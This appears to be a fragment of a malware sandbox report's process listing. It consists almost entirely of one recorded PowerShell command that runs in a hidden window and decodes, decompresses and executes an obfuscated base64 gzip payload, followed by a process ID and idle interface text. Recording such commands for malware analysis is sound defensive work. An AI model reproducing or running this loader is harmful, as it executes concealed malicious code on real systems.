          • powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMH{1}4mYCA71XeY+jxhL/P1K+A4osGWs9NvjYnVlppQfY+IjBB9j4iBW1oQ1tGvBCM5jJy3d/hY85tLPRJlJeS9Y03VXVVb86Z5+GNiNRyGXpp+GS++Pnn7jrmqAYBRxfyo1{1}v8qV8L3cECov16V0+vvhE/eF4zfS8diJAkTC7efPShrHOGSX71oPMylJcLCjBCd8hfsvZ3k4xn'+'fj3QHbjPuDK/1e69Foh+iVLFeQ7WHuTgqd4m4U{1}ajQrmYcKWF8+bffypXNnbitdb+miCZ8{1}cgThoOaQ{1}m5wv1ZKR408yPmyxqx4yiJ9qxmkbDZqM3DBO'+'{1}xDtIe'+'sYaZFzlJGax5sSfGLI3Dq1mFnAsVX4btJI5syXFinCTlKrcpXthst//hN9fnZ{1}nISIBrg5DhODoaOH4kNk5qfRQ6FM/wfgtcBotJ6G4rFSB7jHzMl8KU0ir3d8TwOs5u4P0oE/+aCagmLK5Uwa/vGapFTkrxhbX8jq'+'bnYKjAeg4IwPDPAsb9LY6C{1}TtB9HJwW5vzDQad+UmUkDPrF06ocho8jlgU5/BZMuMUV7bPiHOlXHECq/qj4sQbL3C65pHC0WYREWf7IuBNDJS+RgXJ9+O5g/ckxJ08RAGxbyHLv+cVvKf4DEjtRqaDfnz5eoGdDqbYRayAuQiOb9i6AWHPvHJKqINjyQbPJqAVOL3yVpmL5/jyINRwAOhdviFaS3tIFHyjviZHfnu9+AaiskJRklS5SQqZalc5A'+'yOKnSonhQm5'+'Xkkpi87b8ou6WkoZsVHCbuK{1}lTdgXh9VojBhcWqDVwEA0zhimyBa4FHl+sTBcm4Q9/Z4+V00FEQpZA9IegRvwEmBgsGKWIlBz0tcVGoGZoPgSHEAROfCoVLkQpm4Jsk5upCLnfK7et4S4RL1BSw3PF5pCb4{1}aMSq3ILEDIpQAXERW/9MiW/rD{1}ijxPjqGv6WXhs5Z0UGlA5J10+KIL1idEYkZoCGGkeBjBL8sXWpNPwv9TGZSLBWg5Bqzt'+'An4iCDnw'+'a/OWkOIm1/P'+'{1}FCFGi{1}kkx66r1EMjez73XJdoYOfjC'+'AbrpoMWUi9ad'+'EkFue'+'LQtmsRddV3J0OH'+'NXnk{1}FSadfN1aJQLK+pdkd+SlrJBCqrVZ/KUjNZmvcFHzAbwV8PvAFJDuNYA8ldTySB4ksDGh3qMx{1}VkNdW7Rfb6ne3ooS4+OqU6/XHxzUa1NHkiOnQVO0mEVm3w7ken{1}hOcyci7o5/0C6hZ{1}m9fA'+'RWadk'+'ZdyLo4Pk/qo6x10we3SammvSqauZUqp1EncBcvTD9NOg7zZ0xXenSznb9RbLtTUcoeX0UTe15uigNQaKNzLUmW4qmbvr0XhtyP{1}1pce7HHgaXr5riH'+'T05LfgrVTv{1}OJYabU0QzZX1tqzA/9FTnfhr/P7tp63stGhm+lPA3jfl1DnaGG0r4sL3UQu{1}NEgSt+VpI96VpjzuFuum451aq477mkuLjSbqie7MVwsnyiZLxeTqa+v54DHrtHWUOAcVv4sm89PaCao1shq59Zi3XYa3dPsSc+1udq1G85q3fHEOZWPS0FtaD0{1}RUH7uGtKud0ZZsinQ109ooUgtkzLl+Y9b0nW9V79wRqeqB5J0jDyVNBTdMxFcIgXRusT3FnIPe7PfhDX0Wi6WmHwDcSKqPbIoAumoK6Z6bhTF+cPYgt7o8I45MuRJMOmBwaD9+'+'YNb3VUJxTkgZzxsC06kaTAvapbSP7VInhUF1dLydE+jOSs3ynktxeHzvK'+'DVy/WuOOnmukD3l1RV1onzVxJaV0RI7r+KqmTujj98uUXyKbNnISs{1}diW4qzoNz//VNo3'+'D68T6nv9VENx4iEKiQZ98lbv1C'+'hWr41vEpGCg+cvg5SP4xBTGDxgNLmVConSyC56L/RI6PqXXlyMBvPBWaf3dhXumbDy0pBvR58/r0FJKD'+'3nslAb4dBlXlU4NQUBWqlwElrnGvPjtinRMecv0qpFNz6j8yyfnuWDSLLneP7/gBgMXgw6wP'+'cw+x588LQP9Rr6x6WIFiDKUURfQ3i17Dke3iAI0Ilg/aaYuSBSQMAd/sqVWDGOvB5vSu549S/HzrUZePDH+evYeTn7i9sfiiehekHnm+O3B6+a6L+JgIUIA1IDehrFlzHrPSCu+fLKw+AcyIX9dRX/fYxTdqfDLHvuqv'+'8DWVRtAvsMAAA{0}')-f'=','2')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

            2924

Process contents

No process loaded Click on a process in the tree above to load its data.